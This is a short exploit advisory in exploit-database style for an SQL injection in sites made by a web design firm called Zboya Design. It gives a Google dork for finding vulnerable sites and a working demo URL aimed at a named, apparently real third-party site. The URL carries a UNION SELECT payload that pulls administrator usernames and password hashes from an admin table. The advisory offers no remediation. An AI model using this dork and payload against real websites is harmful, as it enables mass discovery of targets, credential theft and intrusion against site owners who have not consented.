#Exploit Title: Zboya Design– SQL Injection vulnerability
#Date: 2020-10-13
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: https://www.zboyadesign.com
#Google Dork: "designed by Zboya Design"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: https://www.zboyadesign.com/portfolio
Proof of Concept:
1-Search google Dork: "designed by Zboya Design"
Demo: http://www.valleywoodproducts.ca/products.php?cName=Cubbys&categoryId=-2000003%20UNION%20SELECT%201,group_concat(username,0x3a,password),3%20from%20qc_admins--+
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity Team
#Telegram: @pyweb_security